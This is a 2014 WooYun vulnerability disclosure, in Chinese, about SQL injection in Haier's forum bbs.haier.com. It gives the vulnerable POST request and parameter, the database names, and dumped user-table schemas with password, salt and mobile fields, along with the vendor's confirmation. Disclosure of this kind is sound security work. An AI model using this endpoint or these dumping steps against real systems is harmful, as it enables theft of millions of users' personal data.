当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087056

漏洞标题:海尔主论坛SQL注入泄漏42w用户信息

相关厂商:海尔集团

漏洞作者: sm0nk

提交时间:2014-12-13 23:50

修复时间:2015-01-27 23:52

公开时间:2015-01-27 23:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-13: 细节已通知厂商并且等待厂商处理中
2014-12-16: 厂商已经确认,细节仅向厂商公开
2014-12-26: 细节向核心白帽子及相关领域专家公开
2015-01-05: 细节向普通白帽子公开
2015-01-15: 细节向实习白帽子公开
2015-01-27: 细节向公众公开

简要描述:

这与上次提交的漏洞不是一个论坛,两个论坛账户不通用
数据量均不同
trs_common_member | 4222429
qwh_members | 73561

详细说明:

1.上次提交的tbbs.haier.com http://wooyun.org/bugs/wooyun-2014-086690
这次是bbs.haier.com
2.tbbs 是22个数据库
bbs 是 4个库

[*] discuz15
[*] information_schema
[*] newdiscuz15
[*] test


3.SQL注入

POST /HaierBBS/thrdapplycount/gettolcount.do HTTP/1.1
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Referer: http://bbs.haier.com/
Cookie: JSESSIONID=FDC54A75489FA666619AA7C8CDF0CB72.jvm1; idsALUserSource=""
Host: bbs.haier.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
sourceId=455767%2C421738%2C415616%2C256510%2C148866%2C148801%2C479712%2C484890%2C484569%2C484595%2C479986%2C484188&type=1


1.jpg


Database: discuz15
Table: uc_members
[13 columns]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| babao | double |
| email | varchar(96) |
| lastloginip | double |
| lastlogintime | double |
| myid | varchar(90) |
| myidkey | varchar(48) |
| password | varchar(96) |
| regdate | double |
| regip | varchar(45) |
| salt | varchar(18) |
| secques | varchar(24) |
| uid | int(11) |
| username | varchar(45) |
+---------------+-------------+


Database: discuz15
Table: trs_common_member
[40 columns]
+------------------+-----------------------+
| Column | Type |
+------------------+-----------------------+
| accessmasks | tinyint(1) |
| adminid | int(11) |
| adress | varchar(100) |
| allowadmincp | tinyint(1) |
| avatar | varchar(200) |
| avatarstatus | tinyint(1) |
| birthday | varchar(100) |
| city | varchar(100) |
| conisbind | tinyint(1) unsigned |
| credits | int(10) |
| education | varchar(100) |
| educationid | varchar(10) |
| email | varchar(100) |
| emailstatus | tinyint(1) |
| extgroupids | char(20) |
| firstname | varchar(100) |
| gender | int(1) |
| groupexpiry | int(10) unsigned |
| groupid | smallint(6) unsigned |
| lastloginip | varchar(255) |
| lastlogintime | int(10) |
| memcercode | varchar(100) |
| mobile | varchar(255) |
| newpm | smallint(6) unsigned |
| newprompt | smallint(6) unsigned |
| notifysound | tinyint(1) |
| password | char(32) |
| profession | varchar(100) |
| professionid | varchar(10) |
| province | varchar(100) |
| realname | varchar(255) |
| regdate | int(10) unsigned |
| regip | varchar(255) |
| remark | text |
| status | tinyint(1) |
| telephone | varchar(255) |
| timeoffset | char(4) |
| uid | mediumint(8) unsigned |
| username | varchar(50) |
| videophotostatus | tinyint(1) |
+------------------+-----------------------+


4222429 用户名密码

2.jpg


4.来个XSS

bbs-xss.jpg


5.Jquery
http://bbs.haier.com/was5/web/js/jquery.min.js

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizzle.js
* http://sizzlejs.com/
* Copyright 2010, The Dojo Foundation
* Released under the MIT, BSD, and GPL Licenses.
*
* Date: Sat Feb 13 22:33:48 2010 -0500
*/


漏洞证明:

1.jpg


2.jpg


bbs-xss.jpg

修复方案:

过滤吧

版权声明:转载请注明来源 sm0nk@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-12-16 17:49

厂商回复:

谢乌云平台sm0nk的测试与提醒,我方已安排人员进行处理。
报了tbbs的漏洞之后同时也针对bbs的这个漏洞进行修复,还是高吧,rank 10。

最新状态:

暂无